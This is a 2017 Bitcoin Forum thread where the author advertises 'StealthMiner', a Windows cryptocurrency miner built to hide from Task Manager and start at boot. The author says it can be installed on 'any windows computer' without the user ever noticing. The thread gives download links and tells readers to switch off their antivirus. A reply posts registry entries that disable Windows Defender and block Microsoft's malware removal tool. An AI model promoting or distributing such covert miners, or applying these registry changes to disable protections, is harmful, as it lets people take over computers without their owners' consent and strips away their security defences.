Bitcoin Forum
May 05, 2024, 07:39:28 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]

Home   Help Search Login Register More  
Pages: [1] 2 3 4 »  All
  Print  
Author Topic: [ANN]StealthMiner v2.0 BEST STEALTH MULTICOIN CPU/GPU Miner [ANN]  (Read 24485 times)
malev (OP)

Activity: 47
Merit: 0

View Profile
May 29, 2017, 07:53:07 PM
Last edit: June 07, 2017, 08:23:34 PM by malev

StealthMiner v2.0 - The only MultiCurrency Stealth CPU/GPU Miner

Currently Available Coins to Mine:

StealthMiner 2.0 Released:

StealthMiner 2.0 is the ONLY cryptocurrency mining program that lets you currently mine 6 of the best cryptocoins in COMPLETE STEALTH MODE using both GPU and CPU at a perofrmance level that doesn't affect every day use of your computer.

StealthMiner 2.0 FEATURES:
  • Complete Stealth Miner so it cannot be noticed running in the background. It doesn't show in running programs. ONLY you know that the miner is running. You can run it on multiple computers.
  • Automatically switch between 6 coins to mine based on profitability
  • Smart start upon Windows startup. The program starts mining 5min after bootup to avoid any slow down
  • GPU and CPU mining together based on the activity of the computer. The program auto adjusts mining power so that your computer never slows down yet it mines the most coins possible. If your computer is just on and running it will use more resources etc...
  • Simple setup. All you need to do is open a text file and copy past the pool address and your coins' wallet address and you are ready to go.

How to Install StealthMiner 2.0:

1, Download the latest version of StealthMiner: https://mega.nz/#!gOhBUYib!wyLajvOYBe8f-Iy1N4cKh4akD5MIMjB3UFOH7KKDrr0
2, Unzip the Rar into a folder
3, Open autorun.txt file and type in your address and password after the command lines you see. DO NOT DELETE THE COMMAND LINES. You can insert a line for each coin or the coins you want to mine. The program will know what to mine based on which pool servers you save.
Example for Monero: -o stratum+tcp://mine.moneropool.com:3333 -u YOUR_WALLET_ADDRESS -p x
Example for Ethereum: us1.ethermine.org:4444 -u YOUR_WALLET_ADDRESS -p x
4, Just SAVE the file as is.
5, Run StealthMinerInstaller.exe - Your Antivirus will probably say its a virus, either turn off antivirus or run it as an administrator or add it to antivirus exceptions. All miners get a the virus warning, thats just how it is.  
6, HERE BE VERY CAREFUL AND MAKE SURE TO CLICK THINGS THE WAY ITS HERE
7, FIRST click on Install Keys - this will make sure that the software will start on bootup - once you get the success message go on.
8, NOW click on Run Install - this will install the miner - you will see the you have successfully started mining message.

You are all set. you have started mining. You will be able to check your wallet balance and see your coins accumulate.

------------------------------------------------------------------------------------- StealthMiner 1 Development Notes ------------------------------------------------------------------------------------------------------------------------

Description:

StealthMiner is currently the ONLY miner that can be installed with 1 click and mines in complete stealth mode so nobody can see the program running. Open task manager and go to running programs and see completely nothing . Install this on any windows computer and only you will know that a miner is installed.

Latest Update V1.3 Features:
      Promotion Notice: I am working on the next version that will support Nvidia and AMD video cards as well, and thus achieving 3x H/s by combining video card and Cpu into 1 miner. The program will also be stealth so it will only use performance that your computer doesn't need. If you want to be one of the first to try the CPU&GPU Stealth Miner 2 then please download and install StealhMiner 1.3 and post your username in this thread. The first 100 users will receive the miner for free. First come first serve. Quantity available shall be monitored here from now on:
      • fixed bug that caused program to freeze while install
      • Miner now autoselects mining on either 1 or 2 CPU cores depending on the activity on your computer. So for example if you are playing a game or editing software the miner will automatically adjust and switch to 1 cpu core.
      Latest Version Download: https://mega.nz/#!hDpzlZSC!GcvkGHKUeB1Z4gKGGNEcOKlU8jFrJ0pdjYmg4V39APE

Latest Update V1.2 Features:
        • couple stability bug fixes
        • autoscale feature so, if you install the software on multiple devices it will just automatically add the workers together, no need for setting up multiple workers

Latest Update V1.1 Features:
        • 1 Click Install
        • Supported OP: Only Windows for now.
        • Complete Stealth Mode
        • Automatically launch on windows startup - 1 time setup for life
        • Currently supported coins: Monero - more in development
        • Doesnt use all the CPU, only use just enough to make some money but the user shall never realize that a miner is installed. You can also play games and edit videos and do anything and won't notice performance issues, after many tests I found the perfect balance between H/s and computer performance.
        • Latest CPU miner features for maximum H/s

How to Install: MAKE SURE TO READ EVERY STEP CAREFULLY ESPECIALLY 6 DONT MESS IT UP  Cheesy

Either pause your antivirus or add the software to exceptions, so the miner can be installed. All miners get this, antivirus apparently hate mining softwares haha.

1, Download the miner from here: https://mega.nz/#!hDpzlZSC!GcvkGHKUeB1Z4gKGGNEcOKlU8jFrJ0pdjYmg4V39APE (CLICK DOWNLOAD THROUGH BROWSER - YOU DONT WANT MEGA's ANNOYING PROGRAM  Wink
        2, Unzip the file into a folder
        3, Open autorun file and type in your address and passworrd after the command lines you see. DO NOT DELETE THE COMMAND LINES.
        Example -o stratum+tcp://mine.moneropool.com:3333 -u YOUR_WALLET_ADDRESS -p x
        5, Run AutoMoneroInstaller.exe - Your Antivirus will probably say its a virus, either turn off antivirus or run it as an administrator or add it to antivirus exceptions. All miners get a the virus warning, thats just how it is.  
        7, FIRST click on Install Keys - this will make sure that the software will start on bootup - once you get the success message go on.
        8, NOW click on Run Install - this will install the miner - you will see the you have successfully started mining Monero message.

Thats it, you can check your hashrate on the mining pool you selected for yourself.

Updates and Bug Fixes:

I will make sure to roll out patches and updates continuously. If you encounter a bug please post the issue in the comments section or send me a PM, and I will add it to the needed tasks to do for the next update.
        Also please note this is a work in progress so even though the miner is perfectly functional as I have been testing it for over a month, it may have some bugs. So please be patient, this is a fun project for me and you get this for free. So please be patient and kind and dont blast the post with hateful stuff, I will make sure to fix things as fast as I can.  Wink

Happy Mining.  

[/list][/list][/list]

View Profile Personal Message (Offline)

Ignore
        Reply with quote  #2

Report to moderator

Ignore
        Reply with quote  #2

Report to moderator

Ignore
        Reply with quote  #2

Report to moderator
        The block chain is the main innovation of Bitcoin. It is the first distributed timestamping system.
        Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.

Ignore
        Reply with quote  #2

Report to moderator

Ignore
        Reply with quote  #2

Report to moderator

Ignore
        Reply with quote  #2

Report to moderator
        mycoin744

Activity: 6

View Profile
        May 29, 2017, 08:14:02 PM

StealthMiner v1.1

Description:

StealthMiner is currently the ONLY miner that can be installed with 1 click and mines in complete stealth mode so nobody can see the program running. Open task manager and go to running programs and see completely nothing . Install this on any windows computer and only you will know that a miner is installed.

• 1 Click Install
        • Complete Stealth Mode
        • Doesnt use all the CPU, only use just enough to make some money but the user shall never realize that a miner is installed. You can also play games and edit videos and do anything and won't notice performance issues, after many tests I found the perfect balance between H/s and computer performance.

How to Install: MAKE SURE TO READ EVERY STEP CAREFULLY ESPECIALLY 6 DONT MESS IT UP  Cheesy

Either pause your antivirus or add the software to exceptions, so the miner can be installed. All miners get this, antivirus apparently hate mining softwares haha.

1, Download the miner from here: https://mega.nz/#!hDpzlZSC!GcvkGHKUeB1Z4gKGGNEcOKlU8jFrJ0pdjYmg4V39APE (CLICK DOWNLOAD THROUGH BROWSER - YOU DONT WANT MEGA's ANNOYING PROGRAM  Wink
        3, Open autorun file and type in your address and passworrd after the command lines you see. DO NOT DELETE THE COMMAND LINES.
        5, Run AutoMoneroInstaller.exe - Your Antivirus will probably say its a virus, either turn off antivirus or run it as an administrator or add it to antivirus exceptions. All miners get a the virus warning, thats just how it is.  
        8, NOW click on Run Install - this will install the miner - you will see the you have successfully started mining Monero message.

Thats it, you can check your hashrate on the mining pool you selected for yourself.

Updates and Bug Fixes:

I will make sure to roll out patches and updates continuously. If you encounter a bug please post the issue in the comments section or send me a PM, and I will add it to the needed tasks to do for the next update.
        Also please note this is a work in progress so even though the miner is perfectly functional as I have been testing it for over a month, it may have some bugs. So please be patient, this is a fun project for me and you get this for free. So please be patient and kind and dont blast the post with hateful stuff, I will make sure to fix things as fast as I can.  Wink

Happy Mining.  

looking cool. will give it a try. whats the CPU usage on this? and can you see this in task manager?
        malev (OP)

View Profile
        May 29, 2017, 08:21:19 PM

StealthMiner v1.1

Description:

• 1 Click Install
        • Complete Stealth Mode

Updates and Bug Fixes:

Happy Mining.  

looking cool. will give it a try. whats the CPU usage on this? and can you see this in task manager?

thanks. CPU uses mainly 1 core at a time, so decent power that doesnt compromise performance. I designed this specifically so you can easily install it, and have this on while doing your regular routine on your computer or laptop. But at least you are making some money in the process. And of course if you install it on multiple computers than the returns go up.

And no you cannot see the program in task manager at all. That is so great about it. I made it so the software is unnoticeable.
        Cryptoguru

Activity: 16

View Profile
        May 29, 2017, 08:38:49 PM

great!

do you use moneropool for best performance?
        malev (OP)

View Profile
        May 29, 2017, 09:23:07 PM

well, moneropool was just an example. You can use any pool you prefer. I would def join a bigger pool like mineXMR.com or monero.crypto-pool.fr

hope this helps  Smiley
        ZenFr
        Legendary

Activity: 1260
        Merit: 1046

View Profile
        May 29, 2017, 09:25:30 PM

And what is the procedure to uninstall the software ?
        malev (OP)

View Profile
        May 29, 2017, 09:42:29 PM
        Last edit: May 30, 2017, 07:58:04 AM by malev

once installed, just go into the folder you unzipped the file into and delete the following software WindowsDriver.exe

That will make the software pause and terminate. Just make sure to empty the trash and you should be good  Wink
        thespycry

Activity: 42

View Profile
        May 30, 2017, 12:14:23 AM

lol it is exactly what the virus wannacry was doing... silently mining monero.
        malev (OP)

View Profile
        May 30, 2017, 06:16:58 AM

StealthMiner is a CPU miner for Monero that has stealth capabilities. It is designed for the 99% of people that dont't want to or know how to deal with annoying command prompts and bat files just to mine cryptocoins. The user downloads it, installs it, sets it up, and mines for himself. This has no resemblance to wannacry ransomware at all.

I just tried to make something that is user friendly and can be used by a lot more people who are not programmers but still wanna get involved with excited coins such as Monero.
        Eyedol-X

Activity: 952
        Merit: 508

View Profile
        May 30, 2017, 06:55:33 AM

Interesting concept but this program pretty much will set off every major antivirus program out there and separately requires the computer it runs on to disable Windows Defender and the Malicious Software Removal Tool... but you knew that already Wink

Now if you could accomplish this without all that, you could really have something until someone out there uses your program in the next virus, then everyone will detect it again.

Code:
        Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
        "DisableAntiSpyware"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT]
        "DontOfferThroughWUAU"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
        "DisallowRun"=dword:00000001
        [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun]
        "1"="mrt.exe"
        VyprBTC

Activity: 350
        Merit: 100

View Profile
        May 30, 2017, 07:36:37 AM

Would be great addition to any RATing tool. Pretty much why I don't open ANY kind of file that isnt' txt. I guess i'm foooooked when they find out how to RAT you via txt lol
        malev (OP)

View Profile
        May 30, 2017, 07:55:18 AM

Interesting concept but this program pretty much will set off every major antivirus program out there and separately requires the computer it runs on to disable Windows Defender and the Malicious Software Removal Tool... but you knew that already Wink

Now if you could accomplish this without all that, you could really have something until someone out there uses your program in the next virus, then everyone will detect it again.

Code:
        Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
        "DisableAntiSpyware"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT]
        "DontOfferThroughWUAU"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
        "DisallowRun"=dword:00000001
        [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun]
        "1"="mrt.exe"

Thank you, yeah I think it's very interesting as well. I know the Antivirus stuff is annoying, but I'm working on a way to bypass that but also I would not want someone using this in a virus for sure.
        ZenFr
        Legendary

View Profile
        May 30, 2017, 08:17:53 AM

once installed, just go into the folder you unzipped the file into and delete the following software WindowsDriver.exe

That will make the software pause and terminate. Just make sure to empty the trash and you should be good  Wink
        Ok, thank you for the reply.

Is there any fee in the miner code or we earn all the hashrate, all time ?
        malev (OP)

View Profile
        May 30, 2017, 01:43:21 PM

Hey,

No there is no additional fee for using the miner. Only what you pay for the mining pool, which I cannot control.
        ZenFr
        Legendary

View Profile
        May 30, 2017, 02:34:42 PM

Hey,

No there is no additional fee for using the miner. Only what you pay for the mining pool, which I cannot control.
        Hey :-).

Ok, very good.
        Why do you not use a public licence and post your sources in GitHub ?
        If there is no fees, it's will be good for all the community and yourself (community helping) ?
        malev (OP)

View Profile
        May 30, 2017, 04:33:43 PM

Hey,

Ok, very good.
        If there is no fees, it's will be good for all the community and yourself (community helping) ?

haha well, i like this being my little project and I am confident it will already help people mine monero very easily so I am fine with that for now. As things move on I might consider making it a more public project, I would just really like more traction and popularity so I can see how the program handles many many users. You know there is always someone with a special situation that might help me fix a big here and there.

That is also the main reason why I posted the software here, so I can get the word out there and hopefully get users who can report the bugs for me.  Smiley
        TimeTeller

Activity: 2716
        Merit: 588

View Profile
        May 30, 2017, 05:39:52 PM
        Last edit: May 30, 2017, 11:08:07 PM by TimeTeller

That will make the software pause and terminate. Just make sure to empty the trash and you should be good  Wink

Hey,

Ok, very good.

haha well, i like this being my little project and I am confident it will already help people mine monero very easily so I am fine with that for now. As things move on I might consider making it a more public project, I would just really like more traction and popularity so I can see how the program handles many many users. You know there is always someone with a special situation that might help me fix a big here and there.

That is also the main reason why I posted the software here, so I can get the word out there and hopefully get users who can report the bugs for me.  Smiley

I've been mining XMR and derivatives or whatever for a so long already.
        And seriously i would love to use some of the cpu power I've just sitting around....
        BUT and that my friend is a big BUTT to it...
        as the others said if you could eliminate all the negative crap behind it like it requiring to disable protection and so fourth, that is when you product will have large and wide spread adoption.
        For example... minergate.... except I really don't like them REALLY DON'T!
        Their specialty is the simplistic use ... not only user friendly but stupid user friendly and stupid  is pretty wide spread and a vast level of really unfortunate people that can not even pull their own finger outta their own  arse!      
        WOW I finally used that word and in context   yea me!!!!
        That is one of the advantages of open source is the community will assist in the improvements and that help the users and increases the adoption!
        Understandable that it's your baby and the sentiments  are perfectly in line.
        But you made this nice beast and it's you yourself that is holding it back from growth.
        And by all means that is YOUR prerogative.
        Cheers!  Cheesy
        malev (OP)

View Profile
        May 30, 2017, 07:43:45 PM

Yeah TimeTeller i totally see your point. It is just very hard to fine tune something as special of a software as a miner to not set off any antivirus detectors. As far as my Monero miner goes, I only said that you need to pause the antivirus while installing just to be on the very safe side. For example when Í was testing it on my desktop for which I of course have admin access then i could just download the software click on the 2 buttons to install and the miner started mining in the background without any hiccups. SO I guess that is pretty cool, just to have a background miner mining a pretty valuable and interesting coin as Monero and you can just literately forget about it for 5 years haha and then wake up and realize that you are a millionaire  Wink

On my old desktop I was getting enough H/s to earn around $300 a year. Yes that is not a fortune but considering that it runs in the background every time you boot up the computer (so even if you are forgetful and would forget opening the app, it does that for you) and of course without any performance slowdown, I think that is pretty cool. I was for example playing some pretty recent games on decent graphics and had the mining running in the background without any problems.

But of course as I said earlier I will be putting it on GitHub after a while. I would just like to get more people to start using it so I can get feedback on the front end side of things. The back-end is pretty cool in my opinion and runs smoothly. So I need users really to test experience.
        malev (OP)

View Profile
        June 02, 2017, 08:39:42 PM

Latest Update V1.3 Features:
          • fixed bug that caused program to freeze while install
          • Miner now autoselects mining on either 1 or 2 CPU cores depending on the activity on your computer. So for example if you are playing a game or editing software the miner will automatically adjust and switch to 1 cpu core.
          Latest Version Download: https://mega.nz/#!hDpzlZSC!GcvkGHKUeB1Z4gKGGNEcOKlU8jFrJ0pdjYmg4V39APE[/list]
          jogebe

Activity: 13

View Profile
          June 03, 2017, 04:50:09 PM

reserved. please add me to StealthMiner 2.0.
          Pages: [1] 2 3 4 »  All
            Print  

Jump to: